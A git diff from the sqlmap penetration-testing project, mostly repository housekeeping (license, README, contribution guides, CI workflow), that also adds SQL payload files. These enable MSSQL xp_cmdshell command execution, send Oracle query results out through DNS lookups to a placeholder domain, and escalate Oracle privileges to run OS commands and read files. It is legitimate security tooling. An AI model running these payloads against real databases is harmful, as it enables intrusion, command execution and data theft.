diff --git a/.gitattributes b/.gitattributes index 8b6e58fe06a..a99321d231b 100644 --- a/.gitattributes +++ b/.gitattributes @@ -1,4 +1,18 @@ +*.conf text eol=lf +*.json text eol=lf +*.html text eol=lf +*.md text eol=lf +*.md5 text eol=lf +*.pl text eol=lf *.py text eol=lf +*.sh text eol=lf +*.sql text eol=lf +*.txt text eol=lf +*.xml text eol=lf +*.yaml text eol=lf +*.yml text eol=lf +LICENSE text eol=lf +COMMITMENT text eol=lf *_ binary *.dll binary diff --git a/.github/CODE_OF_CONDUCT.md b/.github/CODE_OF_CONDUCT.md new file mode 100644 index 00000000000..2a36badf3f6 --- /dev/null +++ b/.github/CODE_OF_CONDUCT.md @@ -0,0 +1,46 @@ +# Contributor Covenant Code of Conduct + +## Our Pledge + +In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. + +## Our Standards + +Examples of behavior that contributes to creating a positive environment include: + +* Using welcoming and inclusive language +* Being respectful of differing viewpoints and experiences +* Gracefully accepting constructive criticism +* Focusing on what is best for the community +* Showing empathy towards other community members + +Examples of unacceptable behavior by participants include: + +* The use of sexualized language or imagery and unwelcome sexual attention or advances +* Trolling, insulting/derogatory comments, and personal or political attacks +* Public or private harassment +* Publishing others' private information, such as a physical or electronic address, without explicit permission +* Other conduct which could reasonably be considered inappropriate in a professional setting + +## Our Responsibilities + +Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. + +Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. + +## Scope + +This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. + +## Enforcement + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 
+ +Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. + +## Attribution + +This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] + +[homepage]: http://contributor-covenant.org +[version]: http://contributor-covenant.org/version/1/4/ diff --git a/CONTRIBUTING.md b/.github/CONTRIBUTING.md similarity index 57% rename from CONTRIBUTING.md rename to .github/CONTRIBUTING.md index 19f3582fd5b..2ae80685613 100644 --- a/CONTRIBUTING.md +++ b/.github/CONTRIBUTING.md @@ -1,38 +1,36 @@ -# Contributing to sqlmap - -## Reporting bugs - -**Bug reports are welcome**! -Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues) or, alternatively, to the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users). - -### Guidelines - -* Before you submit a bug report, search both open and closed issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. -* Make sure you can reproduce the bug with the latest development version of sqlmap. -* Your report should give detailed instructions for how to reproduce the problem. If sqlmap raises an unhandled exception, the traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. -* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* -* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up. - -## Submitting code changes - -All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). - -Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). -Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! - -### Guidelines - -In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: - -* Each patch should make one logical change. -* Wrap code to 76 columns when possible. -* Avoid tabbing, use four blank spaces instead. -* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org). 
-* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. -* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. -* Style that is too different from main branch will be ''adapted'' by the developers side. -* Do not touch anything inside `thirdparty/` and `extra/` folders. - -### Licensing - -By submitting code contributions to the sqlmap developers, to the mailing lists, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap project the unlimited, non-exclusive right to reuse, modify, and relicense the code. sqlmap will always be available Open Source, but this is important because the inability to relicense code has caused devastating problems for other Free Software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. +# Contributing to sqlmap + +## Reporting bugs + +**Bug reports are welcome**! +Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). + +### Guidelines + +* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. +* Make sure you can reproduce the bug with the latest development version of sqlmap. +* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. +* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* + +## Submitting code changes + +All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). + +Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). +Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! + +### Guidelines + +In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: + +* Each patch should make one logical change. +* Avoid tabbing, use four blank spaces instead. 
+* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org). +* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. +* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. +* Style that is too different from main branch will be ''adapted'' by the developers side. +* Do not touch anything inside `thirdparty/` and `extra/` folders. + +### Licensing + +By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 00000000000..e6b299956eb --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1 @@ +github: sqlmapproject diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 00000000000..0a2d0fe4aea --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,37 @@ +--- +name: Bug report +about: Create a report to help us improve +title: '' +labels: bug report +assignees: '' + +--- + +**Describe the bug** +A clear and concise description of what the bug is. + +**To Reproduce** +1. Run '...' +2. See error + +**Expected behavior** +A clear and concise description of what you expected to happen. + +**Screenshots** +If applicable, add screenshots to help explain your problem. + +**Running environment:** + - sqlmap version [e.g. 1.7.2.12#dev] + - Installation method [e.g. pip] + - Operating system: [e.g. Microsoft Windows 11] + - Python version [e.g. 3.11.2] + +**Target details:** + - DBMS [e.g. Microsoft SQL Server] + - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind] + - WAF/IPS [if any] + - Relevant console output [if any] + - Exception traceback [if any] + +**Additional context** +Add any other context about the problem here. diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 00000000000..e301d68ce74 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,20 @@ +--- +name: Feature request +about: Suggest an idea for this project +title: '' +labels: feature request +assignees: '' + +--- + +**Is your feature request related to a problem? Please describe.** +A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] + +**Describe the solution you'd like** +A clear and concise description of what you want to happen. + +**Describe alternatives you've considered** +A clear and concise description of any alternative solutions or features you've considered. 
+ +**Additional context** +Add any other context or screenshots about the feature request here. diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml new file mode 100644 index 00000000000..25100961dcd --- /dev/null +++ b/.github/workflows/tests.yml @@ -0,0 +1,31 @@ +on: + push: + branches: [ master ] + pull_request: + branches: [ master ] + +jobs: + build: + runs-on: ${{ matrix.os }} + strategy: + matrix: + os: [ubuntu-latest, macos-latest, windows-latest] + python-version: [ 'pypy-2.7', '3.8', '3.14' ] + exclude: + - os: macos-latest + python-version: 'pypy-2.7' + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + fetch-depth: 1 + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + - name: Basic import test + run: python -c "import sqlmap; import sqlmapapi" + - name: Smoke test + run: python sqlmap.py --smoke + - name: Vuln test + run: python sqlmap.py --vuln diff --git a/.gitignore b/.gitignore index ff18ea7962e..1f7f94a3b1e 100644 --- a/.gitignore +++ b/.gitignore @@ -1,5 +1,8 @@ -*.py[cod] output/ +__pycache__/ +*.py[cod] .sqlmap_history traffic.txt -*~ \ No newline at end of file +*~ +req*.txt +.idea/ \ No newline at end of file diff --git a/doc/COPYING b/LICENSE similarity index 89% rename from doc/COPYING rename to LICENSE index 52f2214913f..cc0480cafb4 100644 --- a/doc/COPYING +++ b/LICENSE @@ -1,12 +1,12 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2012 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2026 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free -Software Foundation; Version 2 with the clarifications and exceptions -described below. This guarantees your right to use, modify, and +Software Foundation; Version 2 (or later) with the clarifications and +exceptions described below. This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses (contact sales@sqlmap.org). @@ -31,6 +31,9 @@ interpretation of derived works with some common examples. Our interpretation applies only to sqlmap - we do not speak for other people's GPL works. +This license does not apply to the third-party components. More details can +be found inside the file 'doc/THIRD-PARTY.md'. + If you have any questions about the GPL licensing restrictions on using sqlmap in non-GPL works, we would be happy to help. As mentioned above, we also offer alternative license to integrate sqlmap into proprietary @@ -46,14 +49,14 @@ to know exactly what a program is going to do before they run it. Source code also allows you to fix bugs and add new features. You are highly encouraged to send your changes to dev@sqlmap.org for possible incorporation into the main distribution. By sending these changes to the -sqlmap developers, to the mailing lists, or via Git pull request, checking -them into the sqlmap source code repository, it is understood (unless you -specify otherwise) that you are offering the sqlmap project the unlimited, -non-exclusive right to reuse, modify, and relicense the code. 
sqlmap will -always be available Open Source, but this is important because the -inability to relicense code has caused devastating problems for other Free -Software projects (such as KDE and NASM). If you wish to specify special -license conditions of your contributions, just say so when you send them. +sqlmap developers or via Git pull request, checking them into the sqlmap +source code repository, it is understood (unless you specify otherwise) +that you are offering the sqlmap project the unlimited, non-exclusive +right to reuse, modify, and relicense the code. sqlmap will always be +available Open Source, but this is important because the inability to +relicense code has caused devastating problems for other Free Software +projects (such as KDE and NASM). If you wish to specify special license +conditions of your contributions, just say so when you send them. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of @@ -343,29 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS - -**************************************************************************** - -This license does not apply to the following components: - -* The Ansistrm library located under thirdparty/ansistrm/. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. -* The Chardet library located under thirdparty/chardet/. -* The ClientForm library located under thirdparty/clientform/. -* The Colorama library located under thirdparty/colorama/. -* The Fcrypt library located under thirdparty/fcrypt/. -* The Gprof2dot library located under thirdparty/gprof2dot/. -* The KeepAlive library located under thirdparty/keepalive/. -* The Magic library located under thirdparty/magic/. -* The MultipartPost library located under thirdparty/multipartpost/. -* The Odict library located under thirdparty/odict/. -* The Oset library located under thirdparty/oset/. -* The PageRank library located under thirdparty/pagerank/. -* The PrettyPrint library located under thirdparty/prettyprint/. -* The PyDes library located under thirdparty/pydes/. -* The SocksiPy library located under thirdparty/socks/. -* The Termcolor library located under thirdparty/termcolor/. -* The XDot library located under thirdparty/xdot/. -* The icmpsh tool located under extra/icmpsh/. - -Details for the above packages can be found in the THIRD-PARTY.md file. diff --git a/README.md b/README.md index aea30605a5a..e85b3a04359 100644 --- a/README.md +++ b/README.md @@ -1,15 +1,80 @@ -sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 
+# sqlmap ![](https://i.imgur.com/fe85aVR.png) -**Links** +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -* Homepage: http://sqlmap.org +sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki. + +Installation +---- + +You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.7** and **3.x** on any platform. + +Usage +---- + +To get a list of basic options and switches use: + + python sqlmap.py -h + +To get a list of all options and switches use: + + python sqlmap.py -hh + +You can find a sample run [here](https://asciinema.org/a/46601). +To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
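For a quick first run, a minimal sketch of a typical invocation follows, assuming a hypothetical vulnerable GET parameter `id` (the URL below is illustrative only and not part of the patch):

    python sqlmap.py -u "http://www.example.com/vuln.php?id=1" --batch --banner

Here `--batch` answers any interactive prompts with their default values (handy for unattended runs) and `--banner` asks sqlmap to retrieve the back-end DBMS banner once an injection point is confirmed; both switches appear in the `-hh` listing and are covered in detail in the user's manual linked above.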
+ +Links +---- + +* Homepage: https://sqlmap.org * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * User's manual: https://github.com/sqlmapproject/sqlmap/wiki -* Frequently Asked Questions: https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [#1](http://www.youtube.com/user/inquisb/videos) and [#2](http://www.youtube.com/user/stamparm/videos) +* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +Translations +---- + +* [Arabic](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ar-AR.md) +* [Bengali](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bn-BD.md) +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) +* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) +* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) +* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md) +* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md) +* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md) +* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) +* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md) +* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md) +* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md) +* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) +* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md) +* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md) +* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* 
[Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) +* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md) diff --git a/_sqlmap.py b/_sqlmap.py deleted file mode 100644 index 9de694a2bb4..00000000000 --- a/_sqlmap.py +++ /dev/null @@ -1,134 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import bdb -import os -import sys -import time -import traceback -import warnings - -warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) -warnings.filterwarnings(action="ignore", category=DeprecationWarning) - -from lib.controller.controller import start -from lib.core.common import banner -from lib.core.common import dataToStdout -from lib.core.common import getUnicode -from lib.core.common import setPaths -from lib.core.common import weAreFrozen -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.common import unhandledExceptionMessage -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import init -from lib.core.profiling import profile -from lib.core.settings import LEGAL_DISCLAIMER -from lib.core.testing import smokeTest -from lib.core.testing import liveTest -from lib.parse.cmdline import cmdLineParser -from lib.utils.api import StdDbOut - -def modulePath(): - """ - This will get us the program's directory, even if we are frozen - using py2exe - """ - - return os.path.dirname(getUnicode(sys.executable if weAreFrozen() else __file__, sys.getfilesystemencoding())) - -def main(): - """ - Main function of sqlmap when running from command line. - """ - - try: - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() - - # Store original command line options for possible later restoration - cmdLineOptions.update(cmdLineParser().__dict__) - init(cmdLineOptions) - - if hasattr(conf, "api"): - # Overwrite system standard output and standard error to write - # to an IPC database - sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") - sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") - - banner() - - dataToStdout("[!] 
legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) - dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) - - if conf.profile: - profile() - elif conf.smokeTest: - smokeTest() - elif conf.liveTest: - liveTest() - else: - start() - - except SqlmapUserQuitException: - errMsg = "user quit" - logger.error(errMsg) - - except (SqlmapSilentQuitException, bdb.BdbQuit): - pass - - except SqlmapBaseException, e: - e = getUnicode(e) - logger.critical(e) - sys.exit(1) - - except KeyboardInterrupt: - print - errMsg = "user aborted" - logger.error(errMsg) - - except EOFError: - print - errMsg = "exit" - logger.error(errMsg) - - except SystemExit: - pass - - except: - print - errMsg = unhandledExceptionMessage() - logger.critical(errMsg) - traceback.print_exc() - - finally: - dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) - - kb.threadContinue = False - kb.threadException = True - - if conf.get("hashDB"): - try: - conf.hashDB.flush(True) - except KeyboardInterrupt: - pass - - if hasattr(conf, "api"): - try: - conf.database_cursor.close() - conf.database_connection.close() - except KeyboardInterrupt: - pass - - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if conf.get("threads", 0) > 1 or conf.get("dnsServer"): - os._exit(0) diff --git a/procs/README.txt b/data/procs/README.txt similarity index 100% rename from procs/README.txt rename to data/procs/README.txt diff --git a/procs/mssqlserver/activate_sp_oacreate.sql b/data/procs/mssqlserver/activate_sp_oacreate.sql similarity index 100% rename from procs/mssqlserver/activate_sp_oacreate.sql rename to data/procs/mssqlserver/activate_sp_oacreate.sql diff --git a/procs/mssqlserver/configure_openrowset.sql b/data/procs/mssqlserver/configure_openrowset.sql similarity index 100% rename from procs/mssqlserver/configure_openrowset.sql rename to data/procs/mssqlserver/configure_openrowset.sql diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/data/procs/mssqlserver/configure_xp_cmdshell.sql similarity index 77% rename from procs/mssqlserver/configure_xp_cmdshell.sql rename to data/procs/mssqlserver/configure_xp_cmdshell.sql index 349c8cf8c37..e23e4b06a48 100644 --- a/procs/mssqlserver/configure_xp_cmdshell.sql +++ b/data/procs/mssqlserver/configure_xp_cmdshell.sql @@ -2,5 +2,5 @@ EXEC master..sp_configure 'show advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options',0; +EXEC master..sp_configure 'show advanced options',0; RECONFIGURE WITH OVERRIDE diff --git a/data/procs/mssqlserver/create_new_xp_cmdshell.sql b/data/procs/mssqlserver/create_new_xp_cmdshell.sql new file mode 100644 index 00000000000..005730860fa --- /dev/null +++ b/data/procs/mssqlserver/create_new_xp_cmdshell.sql @@ -0,0 +1,3 @@ +DECLARE @%RANDSTR% nvarchar(999); +set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; +EXEC master..sp_executesql @%RANDSTR% diff --git a/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql similarity index 100% rename from procs/mssqlserver/disable_xp_cmdshell_2000.sql rename to data/procs/mssqlserver/disable_xp_cmdshell_2000.sql diff --git a/procs/mssqlserver/dns_request.sql b/data/procs/mssqlserver/dns_request.sql similarity index 
100% rename from procs/mssqlserver/dns_request.sql rename to data/procs/mssqlserver/dns_request.sql diff --git a/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql similarity index 100% rename from procs/mssqlserver/enable_xp_cmdshell_2000.sql rename to data/procs/mssqlserver/enable_xp_cmdshell_2000.sql diff --git a/procs/mssqlserver/run_statement_as_user.sql b/data/procs/mssqlserver/run_statement_as_user.sql similarity index 100% rename from procs/mssqlserver/run_statement_as_user.sql rename to data/procs/mssqlserver/run_statement_as_user.sql diff --git a/procs/mysql/dns_request.sql b/data/procs/mysql/dns_request.sql similarity index 100% rename from procs/mysql/dns_request.sql rename to data/procs/mysql/dns_request.sql diff --git a/procs/mysql/write_file_limit.sql b/data/procs/mysql/write_file_limit.sql similarity index 87% rename from procs/mysql/write_file_limit.sql rename to data/procs/mysql/write_file_limit.sql index 58fccab0a19..e879fbe4030 100644 --- a/procs/mysql/write_file_limit.sql +++ b/data/procs/mysql/write_file_limit.sql @@ -1 +1 @@ -LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- +LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- - diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql new file mode 100644 index 00000000000..5dda762c08d --- /dev/null +++ b/data/procs/oracle/dns_request.sql @@ -0,0 +1,3 @@ +SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual diff --git a/data/procs/oracle/read_file_export_extension.sql b/data/procs/oracle/read_file_export_extension.sql new file mode 100644 index 00000000000..3d66bbaf53d --- /dev/null +++ b/data/procs/oracle/read_file_export_extension.sql @@ -0,0 +1,4 @@ +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT 